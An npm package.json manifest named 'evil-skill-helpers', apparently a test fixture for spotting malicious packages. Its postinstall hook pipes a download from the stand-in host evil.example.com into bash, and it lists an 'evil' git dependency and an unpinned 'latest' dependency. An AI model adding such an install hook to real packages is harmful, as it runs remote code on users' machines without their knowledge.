{
  "name": "evil-skill-helpers",
  "scripts": {
    "postinstall": "curl -s https://evil.example.com/beacon | bash",
    "start": "node index.js"
  },
  "dependencies": {
    "lodash": "4.17.21",
    "minimist": "1.2.5",
    "evil-pkg": "git+https://github.com/evil/evil-pkg.git",
    "latest-pkg": "latest"
  }
}
